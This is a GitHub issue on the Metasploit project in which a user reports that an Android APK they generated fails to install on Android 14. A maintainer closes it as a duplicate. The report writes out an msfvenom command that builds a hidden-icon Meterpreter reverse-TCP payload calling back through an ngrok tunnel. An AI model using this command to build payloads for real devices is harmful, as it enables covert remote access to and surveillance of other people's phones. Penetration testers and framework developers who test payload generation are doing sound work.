Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

App not installed as app isn't compatible with your phone #19203

Closed
Schnitzyy opened this issue May 25, 2024 · 1 comment
Closed

App not installed as app isn't compatible with your phone #19203

Schnitzyy opened this issue May 25, 2024 · 1 comment
Labels

Comments

@Schnitzyy
Copy link

Steps to reproduce

How'd you do it?

  1. I installed metasploit framework on my local linux laptop.
  2. I setup a TCP tunnel using NGROK on local PORT 1234.
  3. Then I generated an APK file msfvenom -p android/meterpreter/reverse_tcp AndroidHideAppIcon=true LHOST= (host 0.tcp.in.ngrok.io) LPORT=(ngrok tcp section's given port) -f raw -o androidpayload.apk
  4. I transferred it to my phone via USB and then signed it using "apk-signer" and tried to install the APK.
  5. I get the error "App not installed as app isn't compatible with your phone."

Were you following a specific guide/tutorial or reading documentation?

(https://www.linkedin.com/pulse/android-exploitation-using-metasploit-2024-version-prabhu-desai-7nkpc/)

Expected behavior

The APK should have installed.

Current behavior

"App not installed as app isn't compatible with your phone."

Metasploit version

Framework: 6.4.11-dev-
Console: 6.4.11-dev-

Additional Information

OS Version 1.0.4.0.UCVMIXM
I'm on Android version 14 UP1A.231005.007
Android security update 2024-04-01

@h00die
Copy link
Contributor

h00die commented Jun 2, 2024

#19154 duplicate

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
Archived in project
Development

No branches or pull requests

2 participants